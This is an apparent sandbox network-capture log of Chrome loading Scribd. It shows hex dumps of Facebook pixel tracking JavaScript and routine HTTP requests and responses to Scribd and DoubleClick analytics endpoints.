                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC16384INData Raw: 7c 64 3d 3d 3d 22 47 54 4d 22 7c 7c 64 3d 3d 3d 22 4a 53 4f 4e 5f 4c 44 22 7c 7c 64 3d 3d 3d 22 4d 45 54 41 5f 54 41 47 22 7c 7c 64 3d 3d 3d 22 4f 50 45 4e 5f 47 52 41 50 48 22 7c 7c 64 3d 3d 3d 22 52 44 46 41 22 7c 7c 64 3d 3d 3d 22 53 43 48 45 4d 41 5f 44 4f 54 5f 4f 52 47 22 7c 7c 64 3d 3d 3d 22 55 52 49 22 3f 64 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 21 3d 6e 75 6c 6c 26 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |d==="GTM"||d==="JSON_LD"||d==="META_TAG"||d==="OPEN_GRAPH"||d==="RDFA"||d==="SCHEMA_DOT_ORG"||d==="URI"?d:null;return b!=null&&c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefin
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC16384INData Raw: 75 72 6e 20 6a 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 78 70 65 72 69 6d 65 6e 74 73 54 79 70 65 64 65 66 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 29 7b 76 61 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: urn j.exports}(a,b,c,d)});f.ensureModuleRegistered("SignalsFBEventsExperimentsTypedef",function(){return function(g,h,i,j){var k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enfo
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC16384INData Raw: 29 2c 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 50 69 78 65 6c 54 79 70 65 64 65 66 22 29 2c 63 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 66 29 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 6a 3d 66 29 3b 66 3d 67 21
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ),b=f.getFbeventsModules("SignalsFBEventsPixelTypedef"),c=f.getFbeventsModules("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="undefined"?"undefined":i(f))==="object"&&(j=f);f=g!
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1703INData Raw: 28 29 3d 3d 3d 64 3f 62 3a 6e 75 6c 6c 3b 62 21 3d 3d 6e 75 6c 6c 26 26 28 6a 5b 61 5b 30 5d 5d 3d 6a 5b 61 5b 30 5d 5d 7c 7c 7b 7d 2c 6a 5b 61 5b 30 5d 5d 5b 61 5b 31 5d 5d 3d 62 29 3b 72 65 74 75 72 6e 20 62 21 3d 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 61 29 2e 6c 65 6e 67 74 68 3e 30 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ()===d?b:null;b!==null&&(j[a[0]]=j[a[0]]||{},j[a[0]][a[1]]=b);return b!==null}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function o(a){return n(a).length>0}function p(a){return Obje
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC14681INData Raw: 79 3a 22 61 64 64 45 6e 63 6f 64 69 6e 67 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 69 66 28 67 2e 66 62 71 3d 3d 6e 75 6c 6c 7c 7c 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 66 3d 6b 28 69 28 6a 28 66 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: y:"addEncodings",value:function(a){var c=this;if(g.fbq==null||g.fbq.__fbeventsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==null)return;f=k(i(j(f),function(a){return c.moduleEnc
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC16384INData Raw: 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 55 74 69 6c 73 22 29 3b 76 61 72 20 64 3d 62 2e 6d 61 70 2c 65 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 3b 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 58 48 52 22 29 3b 76 61 72 20 6a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: b=f.getFbeventsModules("SignalsFBEventsUtils");var d=b.map,e=f.getFbeventsModules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET");f.getFbeventsModules("signalsFBEventsSendXHR");var j
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC16384INData Raw: 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 71 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 26 26 74 79 70 65 6f 66 20 61 21 3d 3d 22 6e 75 6d 62 65 72 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 3d 3d 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: typeof a!=="string")throw new g();return a}}function q(){return function(a){if(typeof a!=="string"&&typeof a!=="number")throw new g();return a}}function r(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=="object"||Array.isArray(a)||a==n


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        53192.168.2.1649781151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC2373OUTGET /log/dd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f9 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC389INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890054-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        54192.168.2.1649782151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC2521OUTGET /api/v1/events HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f9 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC389INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890025-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        55192.168.2.1649777142.250.181.664436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1005OUTGET /td/ga/rul?tid=G-8KZ8BV0P5W&gacid=30215218.1733522367&gtm=45je4c40v9101042369z878386455za200zb78386455&dma=0&gcs=G1--&gcd=13l3l3l3l5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485&z=2071923882 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: td.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Server: cafe
                                                                                                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 06-Dec-2024 22:14:30 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: d<html></html>
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        56192.168.2.1649779142.250.181.664436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC1010OUTGET /td/ga/rul?tid=G-Z4ZC50DED6&gacid=30215218.1733522367&gtm=45je4c40v9101043253z878386455za200zb78386455&dma=0&gcs=G1--&gcd=13l3l3l3l5l1&npa=0&pscdl=noapi&_ng=1&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485&z=380623333 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: td.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Server: cafe
                                                                                                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 06-Dec-2024 22:14:30 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: d<html></html>
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        57192.168.2.164979144.221.168.2244436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
